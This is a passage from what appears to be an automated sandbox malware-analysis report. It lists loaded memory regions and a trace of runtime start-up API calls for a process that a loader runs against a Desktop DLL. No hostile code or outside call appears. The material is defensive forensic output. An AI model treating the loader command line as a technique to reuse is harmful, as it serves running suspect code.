"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2893 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2894 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2895 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2896 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2897 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2898 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2899 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2900 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2901 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 2902 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2903 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2904 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2905 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2906 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2907 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 2908 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2909 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2910 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2911 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2912 start_va = 0x5e0000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2913 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2914 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2915 start_va = 0xd0000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Thread: id = 138 os_tid = 0xda8 [0036.172] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f5fc | out: lpSystemTimeAsFileTime=0x26f5fc*(dwLowDateTime=0xe33e3bb0, dwHighDateTime=0x1d3dfba)) [0036.172] GetCurrentProcessId () returned 0xda4 [0036.172] GetCurrentThreadId () returned 0xda8 [0036.173] GetTickCount () returned 0x18297 [0036.173] QueryPerformanceCounter (in: lpPerformanceCount=0x26f5f4 | out: lpPerformanceCount=0x26f5f4*=376944964) returned 1 [0036.173] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.174] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.174] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.174] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.174] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.174] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.174] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.174] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.175] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.175] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.175] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.175] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.175] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.175] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.175] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.176] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.176] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.176] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.176] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.177] GetCurrentThreadId () returned 0xda8 [0036.177] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"%Temp%\\IXP000.TMP\\\"" [0036.177] GetEnvironmentStringsW () returned 0x307908* [0036.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7409f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.177] FreeEnvironmentStringsW (penv=0x307908) returned 1 [0036.177] GetStartupInfoA (in: lpStartupInfo=0x26f54c | out: lpStartupInfo=0x26f54c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.177] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.177] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.177] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.177] SetHandleCount (uNumber=0x20) returned 0x20 [0036.177] GetLastError () returned 0x0 [0036.177] SetLastError (dwErrCode=0x0) [0036.177] GetLastError () returned 0x0 [0036.178] SetLastError (dwErrCode=0x0) [0036.178] GetLastError () returned 0x0 [0036.178] SetLastError (dwErrCode=0x0) [0036.178] GetACP () returned 0x4e4 [0036.178] GetLastError () returned 0x0 [0036.178] SetLastError (dwErrCode=0x0) [0036.178] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.178] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f52c | out: lpCPInfo=0x26f52c) returned 1 [0036.178] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26eff8 | out: lpCPInfo=0x26eff8) returned 1 [0036.178] GetLastError () returned 0x0 [0036.178] SetLastError (dwErrCode=0x0) [0036.178] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26ef88 | out: lpCharType=0x26ef88) returned 1 [0036.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x26ed78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0036.178] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x26f00c | out: lpCharType=0x26f00c) returned 1 [0036.178] GetLastError () returned 0x0 [0036.178] SetLastError (dwErrCode=0x0) [0036.178] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x26ed48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.178] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.178] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26eb38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿE\x83¨õDõ&", lpUsedDefaultChar=0x0) returned 256 [0036.178] GetLastError () returned 0x0 [0036.178] SetLastError (dwErrCode=0x0) [0036.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f40c, cbMultiByte=256, lpWideCharStr=0x26ed68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.178] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.179] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26eb58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿE\x83¨õDõ&", lpUsedDefaultChar=0x0) returned 256 [0036.179] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.179] GetLastError () returned 0x0 [0036.179] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.180] SetLastError (dwErrCode=0x0) [0036.180] GetLastError () returned 0x0 [0036.181] SetLastError (dwErrCode=0x0) [0036.181] GetLastError () returned 0x0 [0036.181] 